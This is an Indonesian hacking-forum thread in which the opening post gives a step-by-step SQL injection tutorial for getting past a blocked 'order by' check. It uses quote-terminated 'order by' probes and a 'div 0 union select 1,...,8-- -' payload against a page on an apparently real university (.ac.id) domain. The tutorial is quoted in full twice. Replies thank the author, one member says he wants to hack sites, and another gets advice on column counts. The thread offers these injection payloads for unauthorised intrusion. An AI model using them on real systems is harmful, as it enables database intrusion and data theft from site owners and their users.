> > > >


[Share] SQL Injection 'order by 10000' and still not error?
wine trochanter Offline
Coder
141 - 929
#1
02-26-2014, 10:32 PM
assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix
 
Find
Reply

mywisdom Offline
Administrator Forum
6 - 240
#2
02-27-2014, 06:14 PM
waaahhh mantap om, kapan2 ajarin sql injection ya, kebetulan ane lagi belajar juga
Ringlayer Roboticist

www.ringlayer.net
www.ringlayer.com
http://www.robotshop.com/letsmakerobots/blogs/sw0rdm4n



 
Website Find
Reply

Anak-Bodoh Offline

8 - 21
#3
04-20-2014, 03:17 AM
mantap (y) Big Grin
gak tau mau nulis apa , post replynya harus memenuhi 30 karakter :3
 
Find
Reply

arfha Offline
Member
12 - 137
#4
04-20-2014, 09:47 PM
wah makasih infonya pak dokter..
kebetulan mau ngehack mentok disini melulu...
Ijin belajar yakk Big Grin
 
Website Find
Reply

./Gula_an Offline

0 - 2
#5
09-07-2014, 02:00 PM
coba baca dari dulu yaa :v ..

Nice inpoh kaks
 
Find
Reply

dimascyber4rt Offline
Beginner
2 - 92
#6
09-07-2014, 02:45 PM
thanks bro tutornya hehehehe....
 
Website Find
Reply

MalaikatKertas Offline

2 - 35
#7
12-05-2014, 07:25 AM
Biasa nya kalau saya bypass aja pake ' dan +--+
“Make a history in your life, not just a story.”
FacebookTwitter ~ Blog
 
Website Find
Reply

orang sederhana Offline
Share
20 - 200
#8
12-05-2014, 08:08 AM
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

kok ane bgini ya om @[b]wine trochanter[/b]


[b][Image: Untitled1.png]
[/b]

pertamanya begini om 

[Image: Untitled.png]
Twitter : Orang Sederhana
FB : Orang Sederhana
OrangSederhana@IBTeam:~#
 
Website Find
Reply

wine trochanter Offline
Coder
141 - 929
#9
12-05-2014, 06:42 PM
(12-05-2014, 08:08 AM)orang sederhana Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

kok ane bgini ya om @[b]wine trochanter[/b]


[b][Image: Untitled1.png]
[/b]

pertamanya begini om 

[Image: Untitled.png]

union select nya smpe 39 aja, 40 kan udah unknow gtu
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix
 
Find
Reply

Kresna Offline
Mobile AppSec
45 - 700
#10
12-05-2014, 09:12 PM
nice share om , cek kulkas Big Grin
Jangan Makan Tulang Kawan | Kurawa |
 
Find
Reply






Users browsing this thread: 1 Guest(s)